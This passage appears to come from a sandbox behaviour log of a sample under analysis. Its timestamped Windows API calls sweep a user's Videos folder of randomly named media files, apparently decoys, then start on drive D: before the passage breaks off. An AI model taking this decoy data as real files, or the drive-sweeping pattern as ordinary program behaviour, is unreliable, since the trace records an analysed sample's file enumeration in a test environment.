flProtect=0x4) returned 0x12740000 [0256.781] VirtualAlloc (lpAddress=0x110bc000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x110bc000 [0256.781] VirtualAlloc (lpAddress=0x2165000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2165000 [0256.781] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos" (normalized: "c:\\users\\rdhj0cnfevzx\\videos"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.782] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf7ce0f4a, ftLastAccessTime.dwHighDateTime=0x1d82a28, ftLastWriteTime.dwLowDateTime=0xf7ce0f4a, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fea40 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf7ce0f4a, ftLastAccessTime.dwHighDateTime=0x1d82a28, ftLastWriteTime.dwLowDateTime=0xf7ce0f4a, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55792e40, ftCreationTime.dwHighDateTime=0x1d824e7, ftLastAccessTime.dwLowDateTime=0x48daf640, ftLastAccessTime.dwHighDateTime=0x1d829f7, ftLastWriteTime.dwLowDateTime=0x48daf640, ftLastWriteTime.dwHighDateTime=0x1d829f7, nFileSizeHigh=0x0, nFileSizeLow=0x3101, dwReserved0=0x0, dwReserved1=0x0, cFileName="1rfU.mkv", cAlternateFileName="")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4347fe61, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4347fe61, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5839610, ftCreationTime.dwHighDateTime=0x1d82111, ftLastAccessTime.dwLowDateTime=0xb29267b0, ftLastAccessTime.dwHighDateTime=0x1d82963, ftLastWriteTime.dwLowDateTime=0xb29267b0, ftLastWriteTime.dwHighDateTime=0x1d82963, nFileSizeHigh=0x0, nFileSizeLow=0x16697, dwReserved0=0x0, dwReserved1=0x0, cFileName="DV8adgPLs8danhHZ.mp4", cAlternateFileName="DV8ADG~1.MP4")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61042da0, ftCreationTime.dwHighDateTime=0x1d8278f, ftLastAccessTime.dwLowDateTime=0x452d4980, ftLastAccessTime.dwHighDateTime=0x1d828e4, ftLastWriteTime.dwLowDateTime=0x452d4980, ftLastWriteTime.dwHighDateTime=0x1d828e4, nFileSizeHigh=0x0, nFileSizeLow=0x14cd3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eqS3SfB.swf", cAlternateFileName="")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fc10540, ftCreationTime.dwHighDateTime=0x1d8274d, ftLastAccessTime.dwLowDateTime=0xb8432a40, ftLastAccessTime.dwHighDateTime=0x1d8286f, ftLastWriteTime.dwLowDateTime=0xb8432a40, ftLastWriteTime.dwHighDateTime=0x1d8286f, nFileSizeHigh=0x0, nFileSizeLow=0x543f, dwReserved0=0x0, dwReserved1=0x0, cFileName="geY--KBb2-E.flv", cAlternateFileName="GEY--K~1.FLV")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0ea150, ftCreationTime.dwHighDateTime=0x1d82379, ftLastAccessTime.dwLowDateTime=0x2fef03d0, ftLastAccessTime.dwHighDateTime=0x1d8292d, ftLastWriteTime.dwLowDateTime=0x2fef03d0, ftLastWriteTime.dwHighDateTime=0x1d8292d, nFileSizeHigh=0x0, nFileSizeLow=0x42cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="J3dNrQOdkj_GDvbJ.flv", cAlternateFileName="J3DNRQ~1.FLV")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd217f410, ftCreationTime.dwHighDateTime=0x1d8294f, ftLastAccessTime.dwLowDateTime=0x6f05c8d0, ftLastAccessTime.dwHighDateTime=0x1d82967, ftLastWriteTime.dwLowDateTime=0x6f05c8d0, ftLastWriteTime.dwHighDateTime=0x1d82967, nFileSizeHigh=0x0, nFileSizeLow=0x2c67, dwReserved0=0x0, dwReserved1=0x0, cFileName="jJ4i0R21 OaZxd.avi", cAlternateFileName="JJ4I0R~1.AVI")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa99fe270, ftCreationTime.dwHighDateTime=0x1d820a5, ftLastAccessTime.dwLowDateTime=0x76894d70, ftLastAccessTime.dwHighDateTime=0x1d82a11, ftLastWriteTime.dwLowDateTime=0x76894d70, ftLastWriteTime.dwHighDateTime=0x1d82a11, nFileSizeHigh=0x0, nFileSizeLow=0xe47d, dwReserved0=0x0, dwReserved1=0x0, cFileName="K9Xv6MgrumKej.avi", cAlternateFileName="K9XV6M~1.AVI")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b4c1d20, ftCreationTime.dwHighDateTime=0x1d82984, ftLastAccessTime.dwLowDateTime=0x2278140, ftLastAccessTime.dwHighDateTime=0x1d829c1, ftLastWriteTime.dwLowDateTime=0x2278140, ftLastWriteTime.dwHighDateTime=0x1d829c1, nFileSizeHigh=0x0, nFileSizeLow=0xe0db, dwReserved0=0x0, dwReserved1=0x0, cFileName="l1TF3hoXns.avi", cAlternateFileName="L1TF3H~1.AVI")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd2e38d0, ftCreationTime.dwHighDateTime=0x1d81fe7, ftLastAccessTime.dwLowDateTime=0x595fb180, ftLastAccessTime.dwHighDateTime=0x1d8296c, ftLastWriteTime.dwLowDateTime=0x595fb180, ftLastWriteTime.dwHighDateTime=0x1d8296c, nFileSizeHigh=0x0, nFileSizeLow=0x8262, dwReserved0=0x0, dwReserved1=0x0, cFileName="lhMzml c.swf", cAlternateFileName="LHMZML~1.SWF")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ffddc00, ftCreationTime.dwHighDateTime=0x1d81e52, ftLastAccessTime.dwLowDateTime=0x88ac9180, ftLastAccessTime.dwHighDateTime=0x1d82046, ftLastWriteTime.dwLowDateTime=0x88ac9180, ftLastWriteTime.dwHighDateTime=0x1d82046, nFileSizeHigh=0x0, nFileSizeLow=0x71fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="lPGoKFmU.swf", cAlternateFileName="")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830d7b80, ftCreationTime.dwHighDateTime=0x1d82777, ftLastAccessTime.dwLowDateTime=0xe0658170, ftLastAccessTime.dwHighDateTime=0x1d8286b, ftLastWriteTime.dwLowDateTime=0xe0658170, ftLastWriteTime.dwHighDateTime=0x1d8286b, nFileSizeHigh=0x0, nFileSizeLow=0x15b32, dwReserved0=0x0, dwReserved1=0x0, cFileName="MbZcvQXWXnb3nn6YXYz.mkv", cAlternateFileName="MBZCVQ~1.MKV")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce017f70, ftCreationTime.dwHighDateTime=0x1d82212, ftLastAccessTime.dwLowDateTime=0x47be8e00, ftLastAccessTime.dwHighDateTime=0x1d826bb, ftLastWriteTime.dwLowDateTime=0x47be8e00, ftLastWriteTime.dwHighDateTime=0x1d826bb, nFileSizeHigh=0x0, nFileSizeLow=0xa410, dwReserved0=0x0, dwReserved1=0x0, cFileName="PjJi9JDPq9zU_NC m384.flv", cAlternateFileName="PJJI9J~1.FLV")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ac8b20, ftCreationTime.dwHighDateTime=0x1d81ed2, ftLastAccessTime.dwLowDateTime=0x402f1270, ftLastAccessTime.dwHighDateTime=0x1d82785, ftLastWriteTime.dwLowDateTime=0x402f1270, ftLastWriteTime.dwHighDateTime=0x1d82785, nFileSizeHigh=0x0, nFileSizeLow=0xb3e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="PtKr-jmS0E4rPaGC6.swf", cAlternateFileName="PTKR-J~1.SWF")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73f9c180, ftCreationTime.dwHighDateTime=0x1d819c1, ftLastAccessTime.dwLowDateTime=0xa6b1fc80, ftLastAccessTime.dwHighDateTime=0x1d81a5e, ftLastWriteTime.dwLowDateTime=0xa6b1fc80, ftLastWriteTime.dwHighDateTime=0x1d81a5e, nFileSizeHigh=0x0, nFileSizeLow=0x16570, dwReserved0=0x0, dwReserved1=0x0, cFileName="ulGMr.swf", cAlternateFileName="")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe4ea8a0, ftCreationTime.dwHighDateTime=0x1d819c1, ftLastAccessTime.dwLowDateTime=0x9e2915f0, ftLastAccessTime.dwHighDateTime=0x1d81f7f, ftLastWriteTime.dwLowDateTime=0x9e2915f0, ftLastWriteTime.dwHighDateTime=0x1d81f7f, nFileSizeHigh=0x0, nFileSizeLow=0x6ae8, dwReserved0=0x0, dwReserved1=0x0, cFileName="UNI9RnsVnTQHak 3L.mp4", cAlternateFileName="UNI9RN~1.MP4")) returned 1 [0256.782] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2c18f770, ftCreationTime.dwHighDateTime=0x1d81e6a, ftLastAccessTime.dwLowDateTime=0xf596be0, ftLastAccessTime.dwHighDateTime=0x1d82821, ftLastWriteTime.dwLowDateTime=0xf596be0, ftLastWriteTime.dwHighDateTime=0x1d82821, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQ6zmB-l2xOZ", cAlternateFileName="UQ6ZMB~1")) returned 1 [0256.783] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7839030, ftCreationTime.dwHighDateTime=0x1d8254e, ftLastAccessTime.dwLowDateTime=0x6f823bb0, ftLastAccessTime.dwHighDateTime=0x1d8292e, ftLastWriteTime.dwLowDateTime=0x6f823bb0, ftLastWriteTime.dwHighDateTime=0x1d8292e, nFileSizeHigh=0x0, nFileSizeLow=0x8b51, dwReserved0=0x0, dwReserved1=0x0, cFileName="z2V-dpx2Rj7m2.flv", cAlternateFileName="Z2V-DP~1.FLV")) returned 1 [0256.783] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeef38d0, ftCreationTime.dwHighDateTime=0x1d8277f, ftLastAccessTime.dwLowDateTime=0x4be71540, ftLastAccessTime.dwHighDateTime=0x1d827bc, ftLastWriteTime.dwLowDateTime=0x4be71540, ftLastWriteTime.dwHighDateTime=0x1d827bc, nFileSizeHigh=0x0, nFileSizeLow=0xf887, dwReserved0=0x0, dwReserved1=0x0, cFileName="zPSZHcru.mp4", cAlternateFileName="")) returned 1 [0256.783] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47f8a0, ftCreationTime.dwHighDateTime=0x1d81eca, ftLastAccessTime.dwLowDateTime=0xe5319c10, ftLastAccessTime.dwHighDateTime=0x1d81ff2, ftLastWriteTime.dwLowDateTime=0xe5319c10, ftLastWriteTime.dwHighDateTime=0x1d81ff2, nFileSizeHigh=0x0, nFileSizeLow=0x17d4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_wJ5AOb.avi", cAlternateFileName="")) returned 1 [0256.783] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.783] FindClose (in: hFindFile=0x8fea40 | out: hFindFile=0x8fea40) returned 1 [0256.783] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.783] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\*", lpFindFileData=0x123a35f0 | out: lpFindFileData=0x123a35f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2c18f770, ftCreationTime.dwHighDateTime=0x1d81e6a, ftLastAccessTime.dwLowDateTime=0xf596be0, ftLastAccessTime.dwHighDateTime=0x1d82821, ftLastWriteTime.dwLowDateTime=0xf596be0, ftLastWriteTime.dwHighDateTime=0x1d82821, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8feec0 [0256.784] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2c18f770, ftCreationTime.dwHighDateTime=0x1d81e6a, ftLastAccessTime.dwLowDateTime=0xf596be0, ftLastAccessTime.dwHighDateTime=0x1d82821, ftLastWriteTime.dwLowDateTime=0xf596be0, ftLastWriteTime.dwHighDateTime=0x1d82821, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.784] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39bd9ee0, ftCreationTime.dwHighDateTime=0x1d8240e, ftLastAccessTime.dwLowDateTime=0x2bc0e050, ftLastAccessTime.dwHighDateTime=0x1d82976, ftLastWriteTime.dwLowDateTime=0x2bc0e050, ftLastWriteTime.dwHighDateTime=0x1d82976, nFileSizeHigh=0x0, nFileSizeLow=0x3d01, dwReserved0=0x0, dwReserved1=0x0, cFileName="-QGqmvZ9wX70bWC-Lq.flv", cAlternateFileName="-QGQMV~1.FLV")) returned 1 [0256.784] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf14a4970, ftCreationTime.dwHighDateTime=0x1d821be, ftLastAccessTime.dwLowDateTime=0xb6dcec00, ftLastAccessTime.dwHighDateTime=0x1d821f7, ftLastWriteTime.dwLowDateTime=0xb6dcec00, ftLastWriteTime.dwHighDateTime=0x1d821f7, nFileSizeHigh=0x0, nFileSizeLow=0xdb0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="4Jdh3Gyu6WoYeQm.flv", cAlternateFileName="4JDH3G~1.FLV")) returned 1 [0256.784] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e2b520, ftCreationTime.dwHighDateTime=0x1d81c8e, ftLastAccessTime.dwLowDateTime=0x99ad6a00, ftLastAccessTime.dwHighDateTime=0x1d8210d, ftLastWriteTime.dwLowDateTime=0x99ad6a00, ftLastWriteTime.dwHighDateTime=0x1d8210d, nFileSizeHigh=0x0, nFileSizeLow=0x11f0d, dwReserved0=0x0, dwReserved1=0x0, cFileName="63hREK4u.avi", cAlternateFileName="")) returned 1 [0256.784] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e8f9910, ftCreationTime.dwHighDateTime=0x1d81d0c, ftLastAccessTime.dwLowDateTime=0xa4726000, ftLastAccessTime.dwHighDateTime=0x1d82412, ftLastWriteTime.dwLowDateTime=0xa4726000, ftLastWriteTime.dwHighDateTime=0x1d82412, nFileSizeHigh=0x0, nFileSizeLow=0x17a7b, dwReserved0=0x0, dwReserved1=0x0, cFileName="9eQ3WMUXkM.mp4", cAlternateFileName="9EQ3WM~1.MP4")) returned 1 [0256.784] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ee9d40, ftCreationTime.dwHighDateTime=0x1d81dea, ftLastAccessTime.dwLowDateTime=0xffecabc0, ftLastAccessTime.dwHighDateTime=0x1d825f7, ftLastWriteTime.dwLowDateTime=0xffecabc0, ftLastWriteTime.dwHighDateTime=0x1d825f7, nFileSizeHigh=0x0, nFileSizeLow=0x18d18, dwReserved0=0x0, dwReserved1=0x0, cFileName="a55N4D.mp4", cAlternateFileName="")) returned 1 [0256.784] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ed47c0, ftCreationTime.dwHighDateTime=0x1d829d0, ftLastAccessTime.dwLowDateTime=0x617c8660, ftLastAccessTime.dwHighDateTime=0x1d82a0a, ftLastWriteTime.dwLowDateTime=0x617c8660, ftLastWriteTime.dwHighDateTime=0x1d82a0a, nFileSizeHigh=0x0, nFileSizeLow=0x1662a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BiBb.avi", cAlternateFileName="")) returned 1 [0256.784] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94e53a60, ftCreationTime.dwHighDateTime=0x1d8209b, ftLastAccessTime.dwLowDateTime=0xe0fb3720, ftLastAccessTime.dwHighDateTime=0x1d8239c, ftLastWriteTime.dwLowDateTime=0xe0fb3720, ftLastWriteTime.dwHighDateTime=0x1d8239c, nFileSizeHigh=0x0, nFileSizeLow=0x2b52, dwReserved0=0x0, dwReserved1=0x0, cFileName="CUoTLa2sZ2sB3Af.mp4", cAlternateFileName="CUOTLA~1.MP4")) returned 1 [0256.784] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0bc570, ftCreationTime.dwHighDateTime=0x1d81bb4, ftLastAccessTime.dwLowDateTime=0x1c732700, ftLastAccessTime.dwHighDateTime=0x1d82536, ftLastWriteTime.dwLowDateTime=0x1c732700, ftLastWriteTime.dwHighDateTime=0x1d82536, nFileSizeHigh=0x0, nFileSizeLow=0x13371, dwReserved0=0x0, dwReserved1=0x0, cFileName="dhKZR4KXAkkvWyD1_Aa.avi", cAlternateFileName="DHKZR4~1.AVI")) returned 1 [0256.784] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45eba0f0, ftCreationTime.dwHighDateTime=0x1d82214, ftLastAccessTime.dwLowDateTime=0x2f0f8200, ftLastAccessTime.dwHighDateTime=0x1d82969, ftLastWriteTime.dwLowDateTime=0x2f0f8200, ftLastWriteTime.dwHighDateTime=0x1d82969, nFileSizeHigh=0x0, nFileSizeLow=0x594d, dwReserved0=0x0, dwReserved1=0x0, cFileName="FUcQzp6TqxWfef2jhFpt.mp4", cAlternateFileName="FUCQZP~1.MP4")) returned 1 [0256.784] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa91cc6b0, ftCreationTime.dwHighDateTime=0x1d821cc, ftLastAccessTime.dwLowDateTime=0x72342af0, ftLastAccessTime.dwHighDateTime=0x1d8224c, ftLastWriteTime.dwLowDateTime=0x72342af0, ftLastWriteTime.dwHighDateTime=0x1d8224c, nFileSizeHigh=0x0, nFileSizeLow=0x6ded, dwReserved0=0x0, dwReserved1=0x0, cFileName="JhoWTUZ3 EhtG71Sl-.mp4", cAlternateFileName="JHOWTU~1.MP4")) returned 1 [0256.784] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef1e9130, ftCreationTime.dwHighDateTime=0x1d826df, ftLastAccessTime.dwLowDateTime=0x72678e30, ftLastAccessTime.dwHighDateTime=0x1d827b6, ftLastWriteTime.dwLowDateTime=0x72678e30, ftLastWriteTime.dwHighDateTime=0x1d827b6, nFileSizeHigh=0x0, nFileSizeLow=0x2e0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="MCHoHyAA18 aW.avi", cAlternateFileName="MCHOHY~1.AVI")) returned 1 [0256.785] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x172d31d0, ftCreationTime.dwHighDateTime=0x1d82385, ftLastAccessTime.dwLowDateTime=0x1bf7e750, ftLastAccessTime.dwHighDateTime=0x1d82709, ftLastWriteTime.dwLowDateTime=0x1bf7e750, ftLastWriteTime.dwHighDateTime=0x1d82709, nFileSizeHigh=0x0, nFileSizeLow=0x16e7e, dwReserved0=0x0, dwReserved1=0x0, cFileName="O-H60h1HeRHC e51ETm0.flv", cAlternateFileName="O-H60H~1.FLV")) returned 1 [0256.785] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef5212d0, ftCreationTime.dwHighDateTime=0x1d81f14, ftLastAccessTime.dwLowDateTime=0x93771350, ftLastAccessTime.dwHighDateTime=0x1d820ba, ftLastWriteTime.dwLowDateTime=0x93771350, ftLastWriteTime.dwHighDateTime=0x1d820ba, nFileSizeHigh=0x0, nFileSizeLow=0x5363, dwReserved0=0x0, dwReserved1=0x0, cFileName="QEKwGgKsUelEh0NETYm.avi", cAlternateFileName="QEKWGG~1.AVI")) returned 1 [0256.785] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb59b7e30, ftCreationTime.dwHighDateTime=0x1d8203d, ftLastAccessTime.dwLowDateTime=0x511488d0, ftLastAccessTime.dwHighDateTime=0x1d8284e, ftLastWriteTime.dwLowDateTime=0x511488d0, ftLastWriteTime.dwHighDateTime=0x1d8284e, nFileSizeHigh=0x0, nFileSizeLow=0xf871, dwReserved0=0x0, dwReserved1=0x0, cFileName="tkHozG_R-B1rJV9S7Ic.swf", cAlternateFileName="TKHOZG~1.SWF")) returned 1 [0256.785] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a5c1d0, ftCreationTime.dwHighDateTime=0x1d81d02, ftLastAccessTime.dwLowDateTime=0x5f05b1f0, ftLastAccessTime.dwHighDateTime=0x1d82162, ftLastWriteTime.dwLowDateTime=0x5f05b1f0, ftLastWriteTime.dwHighDateTime=0x1d82162, nFileSizeHigh=0x0, nFileSizeLow=0x46b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="wDTVvpZ38Fq9891Oa2hg.mp4", cAlternateFileName="WDTVVP~1.MP4")) returned 1 [0256.785] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39844eb0, ftCreationTime.dwHighDateTime=0x1d81d24, ftLastAccessTime.dwLowDateTime=0x367d51f0, ftLastAccessTime.dwHighDateTime=0x1d81e71, ftLastWriteTime.dwLowDateTime=0x367d51f0, ftLastWriteTime.dwHighDateTime=0x1d81e71, nFileSizeHigh=0x0, nFileSizeLow=0x24d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="wpDqCDIcADj00.flv", cAlternateFileName="WPDQCD~1.FLV")) returned 1 [0256.785] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cff68f0, ftCreationTime.dwHighDateTime=0x1d828b4, ftLastAccessTime.dwLowDateTime=0xe1b97260, ftLastAccessTime.dwHighDateTime=0x1d82a10, ftLastWriteTime.dwLowDateTime=0xe1b97260, ftLastWriteTime.dwHighDateTime=0x1d82a10, nFileSizeHigh=0x0, nFileSizeLow=0x11b25, dwReserved0=0x0, dwReserved1=0x0, cFileName="X12qhHpa.mp4", cAlternateFileName="")) returned 1 [0256.785] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.785] FindClose (in: hFindFile=0x8feec0 | out: hFindFile=0x8feec0) returned 1 [0256.792] CreateFileW (lpFileName="D:\\" (normalized: "d:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.793] FindFirstFileW (in: lpFileName="D:\\*", lpFindFileData=0x123a3a30 | out: lpFindFileData=0x123a3a30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, 